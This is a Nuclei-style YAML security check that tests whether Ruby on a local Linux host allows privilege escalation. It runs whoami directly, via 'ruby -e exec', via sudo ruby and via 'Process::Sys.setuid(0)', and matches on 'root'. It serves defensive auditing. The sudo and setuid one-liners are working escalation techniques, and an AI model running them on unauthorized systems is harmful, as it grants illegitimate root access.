56 lines
1.5 KiB
YAML
56 lines
1.5 KiB
YAML
id: privesc-ruby
|
|
|
|
info:
|
|
name: Ruby - Privilege Escalation
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
|
|
reference:
|
|
- https://gtfobins.github.io/gtfobins/ruby/
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
tags: code,linux,ruby,privesc,local
|
|
|
|
self-contained: true
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
whoami
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
ruby -e 'exec "whoami"'
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
sudo ruby -e 'exec "whoami"'
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
ruby -e 'Process::Sys.setuid(0); exec "whoami"'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: code_1_response
|
|
words:
|
|
- "root"
|
|
negative: true
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(code_2_response, "root")'
|
|
- 'contains(code_3_response, "root")'
|
|
- 'contains(code_4_response, "root")'
|
|
condition: or
|
|
# digest: 4b0a00483046022100bbc6742bc67c075cd2c8607c45ea1ff15ea6427a25a7d6dee8d78743473c0273022100df262f72fa5cffad8d2e1340fffe33e1a58b8bbb5697a8360ca082760d5c5924:922c64590222798bb761d5b6d8e72950 |